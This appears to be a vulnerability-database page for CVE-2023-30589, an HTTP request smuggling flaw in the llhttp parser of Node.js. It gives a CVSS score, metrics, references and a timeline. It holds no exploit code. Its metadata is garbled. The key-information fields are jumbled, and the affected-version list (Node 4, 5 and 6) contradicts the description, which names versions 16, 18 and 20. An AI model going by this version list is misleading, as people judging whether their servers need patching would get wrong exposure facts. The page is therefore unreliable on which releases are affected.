HTTP Request Smuggling Vulnerability in Node.js by OpenJS Foundation
CVE-2023-30589

7.5HIGH

Key Information:

Vendor: Nodejs
Status: Node
Vendor: CVE Published:; 1 July 2023

What is CVE-2023-30589?

The llhttp parser present in the HTTP module of Node.js versions 16, 18, and 20 fails to properly enforce the CRLF sequence for HTTP request delimitation. This oversight allows the parser to interpret the CR character alone as a valid delimiter, which deviates from the specifications set by RFC7230. This vulnerability can inadvertently lead to HTTP Request Smuggling (HRS), enabling attackers to manipulate request headers and execute malicious actions.

Affected Version(s)

Node 4.0 < 4.*

Node 5.0 < 5.*

Node 6.0 < 6.*

References

https://hackerone.com/reports/2001873

https://lists.fedoraproject.org/archives/list/package-ann...

CVSS V3.1

Score:

7.5

Severity:

HIGH

Confidentiality:

None

Integrity:

High

Availability:

None

Attack Vector:

Network

Attack Complexity:

Low

Privileges Required:

None

User Interaction:

None

Scope:

Unchanged

Download the Critical Vulnerability Management Cheat Sheet

Timeline

Vulnerability published
Jul 1, 2023
Vulnerability Reserved
Apr 13, 2023

Nodejs

What is CVE-2023-30589?

Affected Version(s)

References

CVSS V3.1

Timeline